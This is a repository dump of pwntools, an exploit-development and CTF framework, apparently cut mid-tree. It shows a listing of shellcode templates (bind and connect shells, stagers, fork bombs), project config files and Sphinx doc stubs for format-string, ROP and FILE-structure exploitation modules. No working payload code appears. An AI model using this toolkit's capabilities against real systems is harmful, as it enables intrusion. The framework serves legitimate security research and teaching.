│ │ │ ├── poll.asm │ │ │ ├── ppoll.asm │ │ │ ├── ppoll_time64.asm │ │ │ ├── prctl.asm │ │ │ ├── pread.asm │ │ │ ├── pread64.asm │ │ │ ├── preadv.asm │ │ │ ├── preadv2.asm │ │ │ ├── prlimit64.asm │ │ │ ├── process_madvise.asm │ │ │ ├── process_vm_readv.asm │ │ │ ├── process_vm_writev.asm │ │ │ ├── prof.asm │ │ │ ├── profil.asm │ │ │ ├── pselect6.asm │ │ │ ├── pselect6_time64.asm │ │ │ ├── ptrace.asm │ │ │ ├── putpmsg.asm │ │ │ ├── pwrite.asm │ │ │ ├── pwrite64.asm │ │ │ ├── pwritev.asm │ │ │ ├── pwritev2.asm │ │ │ ├── query_module.asm │ │ │ ├── quotactl.asm │ │ │ ├── read.asm │ │ │ ├── readahead.asm │ │ │ ├── readdir.asm │ │ │ ├── readlink.asm │ │ │ ├── readlinkat.asm │ │ │ ├── readv.asm │ │ │ ├── reboot.asm │ │ │ ├── recv.asm │ │ │ ├── recvfrom.asm │ │ │ ├── recvmmsg.asm │ │ │ ├── recvmmsg_time64.asm │ │ │ ├── recvmsg.asm │ │ │ ├── remap_file_pages.asm │ │ │ ├── removexattr.asm │ │ │ ├── rename.asm │ │ │ ├── renameat.asm │ │ │ ├── renameat2.asm │ │ │ ├── request_key.asm │ │ │ ├── reserved221.asm │ │ │ ├── reserved82.asm │ │ │ ├── restart_syscall.asm │ │ │ ├── riscv_flush_icache.asm │ │ │ ├── rmdir.asm │ │ │ ├── rseq.asm │ │ │ ├── rtas.asm │ │ │ ├── sched_get_priority_max.asm │ │ │ ├── sched_get_priority_min.asm │ │ │ ├── sched_getaffinity.asm │ │ │ ├── sched_getattr.asm │ │ │ ├── sched_getparam.asm │ │ │ ├── sched_getscheduler.asm │ │ │ ├── sched_rr_get_interval.asm │ │ │ ├── sched_rr_get_interval_time64.asm │ │ │ ├── sched_setaffinity.asm │ │ │ ├── sched_setattr.asm │ │ │ ├── sched_setparam.asm │ │ │ ├── sched_setscheduler.asm │ │ │ ├── sched_yield.asm │ │ │ ├── seccomp.asm │ │ │ ├── security.asm │ │ │ ├── select.asm │ │ │ ├── semctl.asm │ │ │ ├── semget.asm │ │ │ ├── semop.asm │ │ │ ├── semtimedop.asm │ │ │ ├── semtimedop_time64.asm │ │ │ ├── send.asm │ │ │ ├── sendfile.asm │ │ │ ├── sendfile64.asm │ │ │ ├── sendmmsg.asm │ │ │ ├── sendmsg.asm │ │ │ ├── sendto.asm │ │ │ ├── set_mempolicy.asm │ │ │ ├── set_robust_list.asm │ │ │ ├── set_thread_area.asm │ │ │ ├── set_tid_address.asm │ │ │ ├── setdomainname.asm │ │ │ ├── setfsgid.asm │ │ │ ├── setfsgid32.asm │ │ │ ├── setfsuid.asm │ │ │ ├── setfsuid32.asm │ │ │ ├── setgid.asm │ │ │ ├── setgid32.asm │ │ │ ├── setgroups.asm │ │ │ ├── setgroups32.asm │ │ │ ├── sethostname.asm │ │ │ ├── setitimer.asm │ │ │ ├── setns.asm │ │ │ ├── setpgid.asm │ │ │ ├── setpriority.asm │ │ │ ├── setregid.asm │ │ │ ├── setregid32.asm │ │ │ ├── setresgid.asm │ │ │ ├── setresgid32.asm │ │ │ ├── setresuid.asm │ │ │ ├── setresuid32.asm │ │ │ ├── setreuid.asm │ │ │ ├── setreuid32.asm │ │ │ ├── setrlimit.asm │ │ │ ├── setsid.asm │ │ │ ├── setsockopt.asm │ │ │ ├── settimeofday.asm │ │ │ ├── setuid.asm │ │ │ ├── setuid32.asm │ │ │ ├── setxattr.asm │ │ │ ├── sgetmask.asm │ │ │ ├── shmat.asm │ │ │ ├── shmctl.asm │ │ │ ├── shmdt.asm │ │ │ ├── shmget.asm │ │ │ ├── shutdown.asm │ │ │ ├── sigaction.asm │ │ │ ├── sigaltstack.asm │ │ │ ├── signal.asm │ │ │ ├── signalfd.asm │ │ │ ├── signalfd4.asm │ │ │ ├── sigpending.asm │ │ │ ├── sigprocmask.asm │ │ │ ├── sigqueueinfo.asm │ │ │ ├── sigreturn.asm │ │ │ ├── sigsuspend.asm │ │ │ ├── sigtimedwait.asm │ │ │ ├── sigtimedwait_time64.asm │ │ │ ├── socket.asm │ │ │ ├── socketcall.asm │ │ │ ├── socketcall_accept.asm │ │ │ ├── socketcall_bind.asm │ │ │ ├── socketcall_connect.asm │ │ │ ├── socketcall_getpeername.asm │ │ │ ├── socketcall_getsockname.asm │ │ │ ├── socketcall_getsockopt.asm │ │ │ ├── socketcall_listen.asm │ │ │ ├── socketcall_recv.asm │ │ │ ├── socketcall_recvfrom.asm │ │ │ ├── socketcall_recvmsg.asm │ │ │ ├── socketcall_send.asm │ │ │ ├── socketcall_sendmsg.asm │ │ │ ├── socketcall_sendto.asm │ │ │ ├── socketcall_setsockopt.asm │ │ │ ├── socketcall_shutdown.asm │ │ │ ├── socketcall_socket.asm │ │ │ ├── socketcall_socketpair.asm │ │ │ ├── socketpair.asm │ │ │ ├── splice.asm │ │ │ ├── spu_create.asm │ │ │ ├── spu_run.asm │ │ │ ├── ssetmask.asm │ │ │ ├── stat.asm │ │ │ ├── stat64.asm │ │ │ ├── statfs.asm │ │ │ ├── statfs64.asm │ │ │ ├── statx.asm │ │ │ ├── stime.asm │ │ │ ├── stty.asm │ │ │ ├── subpage_prot.asm │ │ │ ├── swapcontext.asm │ │ │ ├── swapoff.asm │ │ │ ├── swapon.asm │ │ │ ├── switch_endian.asm │ │ │ ├── symlink.asm │ │ │ ├── symlinkat.asm │ │ │ ├── sync.asm │ │ │ ├── sync_file_range.asm │ │ │ ├── sync_file_range2.asm │ │ │ ├── syncfs.asm │ │ │ ├── sys_kexec_load.asm │ │ │ ├── syscall.asm │ │ │ ├── sysfs.asm │ │ │ ├── sysinfo.asm │ │ │ ├── syslog.asm │ │ │ ├── sysmips.asm │ │ │ ├── sysriscv.asm │ │ │ ├── tee.asm │ │ │ ├── tgkill.asm │ │ │ ├── tgsigqueueinfo.asm │ │ │ ├── time.asm │ │ │ ├── timer_create.asm │ │ │ ├── timer_delete.asm │ │ │ ├── timer_getoverrun.asm │ │ │ ├── timer_gettime.asm │ │ │ ├── timer_gettime64.asm │ │ │ ├── timer_settime.asm │ │ │ ├── timer_settime64.asm │ │ │ ├── timerfd.asm │ │ │ ├── timerfd_create.asm │ │ │ ├── timerfd_gettime.asm │ │ │ ├── timerfd_gettime64.asm │ │ │ ├── timerfd_settime.asm │ │ │ ├── timerfd_settime64.asm │ │ │ ├── times.asm │ │ │ ├── tkill.asm │ │ │ ├── truncate.asm │ │ │ ├── truncate64.asm │ │ │ ├── tuxcall.asm │ │ │ ├── ugetrlimit.asm │ │ │ ├── ulimit.asm │ │ │ ├── umask.asm │ │ │ ├── umount.asm │ │ │ ├── umount2.asm │ │ │ ├── uname.asm │ │ │ ├── unlink.asm │ │ │ ├── unlinkat.asm │ │ │ ├── unshare.asm │ │ │ ├── uselib.asm │ │ │ ├── userfaultfd.asm │ │ │ ├── ustat.asm │ │ │ ├── utime.asm │ │ │ ├── utimensat.asm │ │ │ ├── utimensat_time64.asm │ │ │ ├── utimes.asm │ │ │ ├── vfork.asm │ │ │ ├── vhangup.asm │ │ │ ├── vm86.asm │ │ │ ├── vm86old.asm │ │ │ ├── vmsplice.asm │ │ │ ├── vserver.asm │ │ │ ├── wait4.asm │ │ │ ├── waitid.asm │ │ │ ├── waitpid.asm │ │ │ ├── write.asm │ │ │ └── writev.asm │ │ ├── i386 │ │ ├── __doc__ │ │ ├── android │ │ ├── breakpoint.asm │ │ ├── cgc │ │ │ ├── __doc__ │ │ │ ├── allocate.asm │ │ │ ├── cat.asm │ │ │ ├── deallocate.asm │ │ │ ├── fdwait.asm │ │ │ ├── random.asm │ │ │ ├── receive.asm │ │ │ ├── sendfile.asm │ │ │ ├── syscall.asm │ │ │ ├── terminate.asm │ │ │ └── transmit.asm │ │ ├── crash.asm │ │ ├── epilog.asm │ │ ├── freebsd │ │ │ ├── __doc__ │ │ │ ├── acceptloop_ipv4.asm │ │ │ ├── i386_to_amd64.asm │ │ │ ├── sh.asm │ │ │ └── syscall.asm │ │ ├── function.asm │ │ ├── getpc.asm │ │ ├── infloop.asm │ │ ├── itoa.asm │ │ ├── linux │ │ │ ├── __doc__ │ │ │ ├── acceptloop_ipv4.asm │ │ │ ├── cat.asm │ │ │ ├── cat2.asm │ │ │ ├── connect.asm │ │ │ ├── connectstager.asm │ │ │ ├── dir.asm │ │ │ ├── dupio.asm │ │ │ ├── dupsh.asm │ │ │ ├── echo.asm │ │ │ ├── egghunter.asm │ │ │ ├── findpeer.asm │ │ │ ├── findpeersh.asm │ │ │ ├── findpeerstager.asm │ │ │ ├── forkbomb.asm │ │ │ ├── forkexit.asm │ │ │ ├── i386_to_amd64.asm │ │ │ ├── kill.asm │ │ │ ├── killparent.asm │ │ │ ├── loader.asm │ │ │ ├── loader_append.asm │ │ │ ├── mprotect_all.asm │ │ │ ├── pidmax.asm │ │ │ ├── readfile.asm │ │ │ ├── readn.asm │ │ │ ├── recvsize.asm │ │ │ ├── setregid.asm │ │ │ ├── setresuid.asm │ │ │ ├── setreuid.asm │ │ │ ├── sh.asm │ │ │ ├── sleep.asm │ │ │ ├── socket.asm │ │ │ ├── socketcall.asm │ │ │ ├── stage.asm │ │ │ ├── stager.asm │ │ │ ├── syscall.asm │ │ │ └── syscalls │ │ ├── memcpy.asm │ │ ├── mov.asm │ │ ├── nop.asm │ │ ├── prolog.asm │ │ ├── push.asm │ │ ├── pushstr.asm │ │ ├── pushstr_array.asm │ │ ├── ret.asm │ │ ├── setregs.asm │ │ ├── stackarg.asm │ │ ├── stackhunter.asm │ │ ├── stackhunter_helper.asm │ │ ├── strcpy.asm │ │ ├── strlen.asm │ │ ├── trap.asm │ │ └── xor.asm │ │ ├── loongarch64 │ │ ├── __doc__ │ │ ├── linux │ │ │ ├── __doc__ │ │ │ ├── syscall.asm │ │ │ └── syscalls │ │ ├── mov.asm │ │ ├── nop.asm │ │ ├── push.asm │ │ ├── pushstr.asm │ │ ├── pushstr_array.asm │ │ ├── setregs.asm │ │ ├── trap.asm │ │ └── xor.asm │ │ ├── mips │ │ ├── __doc__ │ │ ├── android │ │ ├── freebsd │ │ │ ├── __doc__ │ │ │ └── syscall.asm │ │ ├── linux │ │ │ ├── __doc__ │ │ │ ├── bindsh.asm │ │ │ ├── cat.asm │ │ │ ├── cat2.asm │ │ │ ├── connect.asm │ │ │ ├── dupio.asm │ │ │ ├── dupsh.asm │ │ │ ├── echo.asm │ │ │ ├── findpeer.asm │ │ │ ├── findpeersh.asm │ │ │ ├── forkbomb.asm │ │ │ ├── forkexit.asm │ │ │ ├── kill.asm │ │ │ ├── killparent.asm │ │ │ ├── listen.asm │ │ │ ├── readfile.asm │ │ │ ├── setresuid.asm │ │ │ ├── sh.asm │ │ │ ├── sleep.asm │ │ │ ├── stager.asm │ │ │ ├── syscall.asm │ │ │ └── syscalls │ │ ├── mov.asm │ │ ├── nop.asm │ │ ├── push.asm │ │ ├── pushstr.asm │ │ ├── pushstr_array.asm │ │ ├── setregs.asm │ │ └── trap.asm │ │ ├── powerpc │ │ ├── __doc__ │ │ ├── android │ │ └── linux │ │ │ ├── __doc__ │ │ │ └── syscalls │ │ ├── riscv64 │ │ ├── __doc__ │ │ ├── linux │ │ │ ├── __doc__ │ │ │ ├── cat2.asm │ │ │ ├── kill.asm │ │ │ ├── open.asm │ │ │ ├── sleep.asm │ │ │ ├── syscall.asm │ │ │ └── syscalls │ │ ├── mov.asm │ │ ├── nop.asm │ │ ├── push.asm │ │ ├── pushstr.asm │ │ ├── pushstr_array.asm │ │ ├── setregs.asm │ │ ├── trap.asm │ │ └── xor.asm │ │ └── thumb │ │ ├── __doc__ │ │ ├── android │ │ ├── crash.asm │ │ ├── freebsd │ │ ├── __doc__ │ │ └── syscall.asm │ │ ├── infloop.asm │ │ ├── itoa.asm │ │ ├── linux │ │ ├── __doc__ │ │ ├── bindsh.asm │ │ ├── cat.asm │ │ ├── cat2.asm │ │ ├── connect.asm │ │ ├── connectstager.asm │ │ ├── dupio.asm │ │ ├── dupsh.asm │ │ ├── echo.asm │ │ ├── findpeer.asm │ │ ├── findpeersh.asm │ │ ├── findpeerstager.asm │ │ ├── forkbomb.asm │ │ ├── forkexit.asm │ │ ├── kill.asm │ │ ├── killparent.asm │ │ ├── listen.asm │ │ ├── loader.asm │ │ ├── loader_append.asm │ │ ├── readfile.asm │ │ ├── readn.asm │ │ ├── recvsize.asm │ │ ├── setresuid.asm │ │ ├── sh.asm │ │ ├── sleep.asm │ │ ├── stage.asm │ │ ├── stager.asm │ │ ├── syscall.asm │ │ └── syscalls │ │ ├── memcpy.asm │ │ ├── mov.asm │ │ ├── nop.asm │ │ ├── popad.asm │ │ ├── push.asm │ │ ├── pushad.asm │ │ ├── pushstr.asm │ │ ├── pushstr_array.asm │ │ ├── ret.asm │ │ ├── setregs.asm │ │ ├── to_arm.asm │ │ ├── trap.asm │ │ └── udiv_10.asm ├── term │ ├── __init__.py │ ├── completer.py │ ├── key.py │ ├── keyconsts.py │ ├── keymap.py │ ├── readline.py │ ├── spinners.py │ ├── term.py │ ├── termcap.py │ ├── text.py │ ├── unix_termcap.py │ └── windows_termcap.py ├── testexample.py ├── timeout.py ├── tubes │ ├── __init__.py │ ├── buffer.py │ ├── listen.py │ ├── process.py │ ├── remote.py │ ├── serialtube.py │ ├── server.py │ ├── sock.py │ ├── ssh.py │ └── tube.py ├── ui.py ├── update.py ├── useragents.py ├── util │ ├── __init__.py │ ├── crc │ │ ├── __init__.py │ │ └── known.py │ ├── cyclic.py │ ├── fiddling.py │ ├── getdents.py │ ├── hashes.py │ ├── iters.py │ ├── lists.py │ ├── misc.py │ ├── net.py │ ├── packing.py │ ├── proc.py │ ├── safeeval.py │ ├── sh_string.py │ ├── splash.py │ └── web.py ├── version.py └── windbg.py ├── pyproject.toml ├── setup.py └── travis ├── coverage_chdir.py ├── docker ├── .gitignore ├── 10-import.py ├── Dockerfile ├── Dockerfile.travis ├── Makefile ├── README.md ├── doctest3 ├── ipython_config.py ├── run.sh └── tmux.sh ├── install.sh ├── libcdb_nginx_cache.conf ├── setup_avd.sh ├── setup_avd_fast.sh └── ssh_setup.sh /.gitattributes: -------------------------------------------------------------------------------- 1 | pwnlib/data/* linguist-vendored 2 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # Pwntools Issue Template 2 | 3 | Thanks for contributing to Pwntools! 4 | 5 | When reporting an issue, be sure that you are running the latest released version of pwntools (`pip install --upgrade pwntools`). 6 | 7 | Please verify that your issue occurs on 64-bit Ubuntu 22.04. You can use the Dockerfile on `docker.io` for quick testing. 8 | 9 | ``` 10 | $ docker pull pwntools/pwntools:stable 11 | $ docker run -it pwntools/pwntools:stable 12 | ``` 13 | 14 | If possible, provide a proof-of-concept which demonstrates the problem. Include any binaries or scripts necessary to reproduce the issue, and please include the full debug output via setting the environment variable `PWNLIB_DEBUG=1`. 15 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: feature 6 | assignees: '' 7 | 8 | --- 9 | 10 | Thanks for contributing to Pwntools! Ideas from the community help make Pwntools an amazing tool for everybody. 11 | 12 | If you've got an idea for a new feature, please provide information about: 13 | 14 | * What the feature does 15 | * Why the feature should exist 16 | * What tests should be included 17 | 18 | If you think you can write the feature yourself, please submit a Pull Request and we can review your changes! 19 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/question.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Question 3 | about: Ask us a question about Pwntools 4 | title: '' 5 | labels: question 6 | assignees: '' 7 | 8 | --- 9 | 10 | Thanks for using Pwntools! If you have a question, here are some tips that will make it easier for us to help you. 11 | 12 | ## Check the Documentation 13 | 14 | Pwntools has REALLY extensive documentation. Please check there first! https://docs.pwntools.com 15 | 16 | ## Debug Output 17 | 18 | If you're having an issue with an exploit, run your script with full debugging output, i.e. `python exploit.py DEBUG`. This may help you to see what's happening under the hood, and the debug output will help to diagnose any issues you're encountering. 19 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | 4 | - package-ecosystem: "github-actions" 5 | directory: "/" 6 | schedule: 7 | # Check for updates to GitHub Actions every week 8 | interval: "weekly" 9 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.o 2 | *.hi 3 | *.pyc 4 | *~ 5 | *.swp 6 | .ropeproject 7 | *.pdf 8 | */auto/* 9 | */bin/* 10 | docs/build 11 | build 12 | MANIFEST 13 | dist 14 | venv 15 | .vscode 16 | .idea 17 | *.egg-info 18 | *.core 19 | .coverage 20 | .coverage.* 21 | .idea 22 | __pycache__ 23 | !.github 24 | .DS_Store 25 | -------------------------------------------------------------------------------- /.isort.cfg: -------------------------------------------------------------------------------- 1 | [settings] 2 | indent=' ' 3 | not_skip = __init__.py 4 | force_single_line = 1 -------------------------------------------------------------------------------- /.readthedocs.yaml: -------------------------------------------------------------------------------- 1 | # https://docs.readthedocs.io/en/stable/config-file/v2.html 2 | 3 | version: 2 4 | 5 | build: 6 | os: ubuntu-22.04 7 | tools: 8 | python: "3.12" 9 | 10 | sphinx: 11 | configuration: docs/source/conf.py 12 | 13 | python: 14 | install: 15 | - requirements: docs/requirements.txt 16 | -------------------------------------------------------------------------------- /.sublime-settings: -------------------------------------------------------------------------------- 1 | { 2 | "default_encoding": "UTF-8", 3 | "ensure_newline_at_eof_on_save": true, 4 | "tab_size": 4, 5 | "translate_tabs_to_spaces": true, 6 | "trim_trailing_white_space_on_save": true 7 | } 8 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | graft build 2 | graft examples 3 | graft extra 4 | graft travis 5 | include *.md *.txt *.sh *.yml MANIFEST.in 6 | recursive-include docs *.rst *.png Makefile *.py *.txt 7 | recursive-include pwnlib *.py *.asm *.rst *.md *.txt *.sh __doc__ *.mako 8 | recursive-include pwn *.py *.asm *.rst *.md *.txt *.sh 9 | global-exclude *.pyc 10 | -------------------------------------------------------------------------------- /docs/.gitignore: -------------------------------------------------------------------------------- 1 | build 2 | robots.txt 3 | -------------------------------------------------------------------------------- /docs/requirements.txt: -------------------------------------------------------------------------------- 1 | capstone 2 | coverage[toml] 3 | python-dateutil 4 | doc2dash 5 | docutils>=0.18 6 | intervaltree 7 | isort 8 | mako>=1.0.0 9 | paramiko>=1.15.2 10 | pip>=6.0.8 11 | pyelftools>=0.29 12 | pygments>=2.0 13 | pypandoc 14 | pyserial>=2.7 15 | pysocks 16 | psutil 17 | requests>=2.5.1 18 | ropgadget>=5.3 19 | sphinx>=8.1.3, <9 20 | sphinx_rtd_theme 21 | sphinxcontrib-autoprogram<=0.1.5 22 | -------------------------------------------------------------------------------- /docs/source/adb.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pprint import pprint 4 | from pwn import * 5 | adb = pwnlib.adb 6 | 7 | import doctest 8 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['LINUX'] 9 | 10 | :mod:`pwnlib.adb` --- Android Debug Bridge 11 | ===================================================== 12 | 13 | .. automodule:: pwnlib.adb.adb 14 | :members: 15 | 16 | .. automodule:: pwnlib.adb.protocol 17 | :members: 18 | -------------------------------------------------------------------------------- /docs/source/args.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | 5 | :mod:`pwnlib.args` --- Magic Command-Line Arguments 6 | ===================================================== 7 | 8 | .. automodule:: pwnlib.args 9 | :members: 10 | -------------------------------------------------------------------------------- /docs/source/asm.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | import tempfile 4 | import subprocess 5 | from pwn import * 6 | 7 | # TODO: Remove global POSIX flag 8 | import doctest 9 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 10 | 11 | :mod:`pwnlib.asm` --- Assembler functions 12 | ========================================= 13 | 14 | .. automodule:: pwnlib.asm 15 | :members: 16 | 17 | Internal Functions 18 | ----------------------------------------- 19 | 20 | These are only included so that their tests are run. 21 | 22 | You should never need these. 23 | 24 | .. autofunction:: pwnlib.asm.dpkg_search_for_binutils 25 | .. autofunction:: pwnlib.asm.print_binutils_instructions 26 | -------------------------------------------------------------------------------- /docs/source/atexception.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.atexception` --- Callbacks on unhandled exception 2 | ============================================================== 3 | 4 | .. automodule:: pwnlib.atexception 5 | :members: 6 | -------------------------------------------------------------------------------- /docs/source/atexit.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.atexit` --- Replacement for atexit 2 | =============================================== 3 | 4 | .. automodule:: pwnlib.atexit 5 | :members: 6 | -------------------------------------------------------------------------------- /docs/source/commandline.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | old = context.defaults.copy() 5 | 6 | .. testcleanup:: * 7 | 8 | context.defaults.copy = old 9 | 10 | Command Line Tools 11 | ======================== 12 | 13 | pwntools comes with a handful of useful command-line utilities which serve as wrappers for some of the internal functionality. 14 | 15 | If these tools do not appear to be installed, make sure that you have added ``~/.local/bin`` to your ``$PATH`` environment variable. 16 | 17 | .. toctree:: 18 | 19 | .. autoprogram:: pwnlib.commandline.main:parser 20 | :prog: pwn 21 | -------------------------------------------------------------------------------- /docs/source/config.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.config` --- Pwntools Configuration File 2 | ==================================================== 3 | 4 | .. automodule:: pwnlib.config 5 | -------------------------------------------------------------------------------- /docs/source/constants.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib import constants 4 | from pwnlib.context import context 5 | 6 | :mod:`pwnlib.constants` --- Easy access to header file constants 7 | ================================================================ 8 | 9 | .. automodule:: pwnlib.constants 10 | -------------------------------------------------------------------------------- /docs/source/dynelf.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.dynelf` --- Resolving remote functions using leaks 2 | =============================================================== 3 | 4 | .. automodule:: pwnlib.dynelf 5 | :members: 6 | -------------------------------------------------------------------------------- /docs/source/elf.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.elf import * 4 | from pwnlib.util.misc import which 5 | 6 | :mod:`pwnlib.elf` --- ELF Executables and Libraries 7 | =================================================== 8 | 9 | .. automodule:: pwnlib.elf 10 | 11 | 12 | ELF Modules 13 | ------------------- 14 | 15 | .. toctree:: 16 | elf/elf 17 | elf/config 18 | elf/corefile 19 | -------------------------------------------------------------------------------- /docs/source/elf/config.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | from pwnlib.elf.config import parse_kconfig 5 | 6 | :mod:`pwnlib.elf.config` --- Kernel Config Parsing 7 | =========================================================== 8 | 9 | .. automodule:: pwnlib.elf.config 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/exception.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.exception` --- Pwnlib exceptions 2 | ==================================================== 3 | 4 | .. automodule:: pwnlib.exception 5 | :members: 6 | -------------------------------------------------------------------------------- /docs/source/filepointer.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.filepointer import * 4 | 5 | :mod:`pwnlib.filepointer` --- `FILE*` structure exploitation 6 | ============================================================ 7 | 8 | .. automodule:: pwnlib.filepointer 9 | :members: 10 | -------------------------------------------------------------------------------- /docs/source/filesystem.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | import time 4 | import six 5 | from pwnlib.context import context 6 | from pwnlib.tubes.ssh import ssh 7 | from pwnlib.filesystem import * 8 | 9 | # TODO: Remove global POSIX flag 10 | import doctest 11 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 12 | 13 | :mod:`pwnlib.filesystem` --- Manipulating Files Locally and Over SSH 14 | ==================================================================== 15 | 16 | Provides a Python2-compatible :py:mod:`pathlib` interface for paths 17 | on the local filesystem (`.Path`) as well as on remote filesystems, 18 | via SSH (`.SSHPath`). 19 | 20 | .. automodule:: pwnlib.filesystem 21 | :members: -------------------------------------------------------------------------------- /docs/source/flag.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | 5 | 6 | :mod:`pwnlib.flag` --- CTF Flag Management 7 | ========================================== 8 | 9 | .. automodule:: pwnlib.flag 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/fmtstr.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | import tempfile 5 | 6 | :mod:`pwnlib.fmtstr` --- Format string bug exploitation tools 7 | ============================================================= 8 | 9 | .. automodule:: pwnlib.fmtstr 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/gdb.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | context.arch = 'amd64' 5 | context.terminal = [os.path.join(os.path.dirname(pwnlib.__file__), 'gdb_faketerminal.py')] 6 | 7 | # TODO: Test on cygwin too 8 | import doctest 9 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 10 | 11 | :mod:`pwnlib.gdb` --- Working with GDB 12 | ====================================== 13 | 14 | .. automodule:: pwnlib.gdb 15 | :members: 16 | -------------------------------------------------------------------------------- /docs/source/install/headers.rst: -------------------------------------------------------------------------------- 1 | Python Development Headers 2 | ----------------------------- 3 | 4 | Some of pwntools' Python dependencies require native extensions (for example, Paramiko requires PyCrypto). 5 | 6 | In order to build these native extensions, the development headers for Python must be installed. 7 | 8 | Ubuntu 9 | ^^^^^^^^^^^^^^^^ 10 | 11 | .. code-block:: bash 12 | 13 | $ sudo apt-get install python-dev 14 | 15 | Mac OS X 16 | ^^^^^^^^^^^^^^^^ 17 | 18 | No action needed. -------------------------------------------------------------------------------- /docs/source/libcdb.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | from pwnlib.libcdb import * 5 | 6 | # TODO: Remove global POSIX flag 7 | import doctest 8 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 9 | 10 | :mod:`pwnlib.libcdb` --- Libc Database 11 | =========================================== 12 | 13 | .. automodule:: pwnlib.libcdb 14 | :members: 15 | -------------------------------------------------------------------------------- /docs/source/log.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.log` --- Logging stuff 2 | =================================== 3 | 4 | .. automodule:: pwnlib.log 5 | :members: getLogger, install_default_handler, rootlogger 6 | 7 | .. autoclass:: pwnlib.log.Progress 8 | :members: 9 | :member-order: bysource 10 | 11 | .. autoclass:: pwnlib.log.Logger 12 | :members: 13 | :member-order: bysource 14 | 15 | .. autoclass:: pwnlib.log.Handler 16 | :members: 17 | :member-order: bysource 18 | 19 | .. autoclass:: pwnlib.log.Formatter 20 | :members: 21 | :member-order: bysource 22 | -------------------------------------------------------------------------------- /docs/source/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Gallopsled/pwntools/932cc375dadc8febce3907249162f81db1d5e0a9/docs/source/logo.png -------------------------------------------------------------------------------- /docs/source/memleak.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | 5 | :mod:`pwnlib.memleak` --- Helper class for leaking memory 6 | ========================================================= 7 | 8 | .. automodule:: pwnlib.memleak 9 | :members: 10 | -------------------------------------------------------------------------------- /docs/source/protocols.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | 5 | 6 | :mod:`pwnlib.protocols.adb` --- Protocol implementations 7 | ======================================================== 8 | 9 | .. automodule:: pwnlib.protocols.adb 10 | :members: -------------------------------------------------------------------------------- /docs/source/qemu.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | 5 | # TODO: Remove global POSIX flag 6 | import doctest 7 | doctest_additional_flags = doctest.OPTIONFLAGS_BY_NAME['POSIX'] 8 | 9 | 10 | :mod:`pwnlib.qemu` --- QEMU Utilities 11 | ========================================== 12 | 13 | .. automodule:: pwnlib.qemu 14 | :members: 15 | -------------------------------------------------------------------------------- /docs/source/regsort.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwnlib.regsort import * 4 | 5 | :mod:`pwnlib.regsort` --- Register sorting 6 | =========================================================== 7 | 8 | .. automodule:: pwnlib.regsort 9 | :members: 10 | -------------------------------------------------------------------------------- /docs/source/replacements.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.replacements` --- Replacements for various functions 2 | ================================================================= 3 | 4 | .. automodule:: pwnlib.replacements 5 | :members: 6 | -------------------------------------------------------------------------------- /docs/source/rop.rst: -------------------------------------------------------------------------------- 1 | :mod:`pwnlib.rop` --- Return Oriented Programming 2 | ================================================= 3 | 4 | Submodules 5 | ---------- 6 | 7 | .. toctree:: 8 | :glob: 9 | 10 | rop/* 11 | -------------------------------------------------------------------------------- /docs/source/rop/ret2dlresolve.rst: -------------------------------------------------------------------------------- 1 | .. testsetup:: * 2 | 3 | from pwn import * 4 | import tempfile 5 | 6 | :mod:`pwnlib.rop.ret2dlresolve` --- Return to dl_resolve 7 | ======================================================== 8 | 9 | .. automodule:: pwnlib.rop.ret2dlresolve 10 | :members: 11 | -------------------------------------------------------------------------------- /docs/source/rop/srop.rst: 